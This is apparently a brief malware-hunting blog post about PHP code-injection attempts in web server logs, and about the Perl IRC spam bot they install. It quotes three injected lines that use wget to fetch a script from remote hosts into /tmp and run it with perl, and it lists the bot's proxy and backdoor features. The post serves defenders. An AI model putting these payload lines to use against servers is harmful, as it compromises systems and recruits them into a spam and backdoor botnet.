Recently You maybe saw strange input in server logs…
<?php system(“wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz”); ?>
<?php system(“wget http://126.96.36.199/lol.c -O /tmp/shz;perl /tmp/shz”); ?>
<?php system(“wget http://188.8.131.52/lol.c -O /tmp/shz;perl /tmp/shz”); ?>
What does that mean? Well, first of all, Your server potentially vulnerable to the PHP code injection, at least. Check and update\patch\fix it.
Second – check for processes, that run from /tmp/ folder and with default Apache user. If there are – You’ve been infected. Take care of it
Now, how exactly this stuff looks like?
VT sample, in case You curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269
It’s IRC Server-oriented bot, with the main capability to SPAM. Language looks like Portuguese- Brazilian?
It also seen in wild since 2012, at least, Google said 🙂 But older versions had less functionality. And now it back 🙂
That’s how it behave:
1. Script connect to IRC server, protected with credentials [unfortunately, it not available now]
2. Fetch list of the mails, names and addresses for replies from embedded URLs, compose the mail messages and send them in behalf of Apache user.
Among other bot capabilities:
- Proxy server
- Socks server
- Backdoor – command request and execution
And, since fun is everything in the malware hunting:
One of functions:
🙂 he\she is so exited 🙂
It’s not new player on this game field, but recently he\she back in business, so please be aware.
Well, review Your logs and\or update me, in case You have some additional info.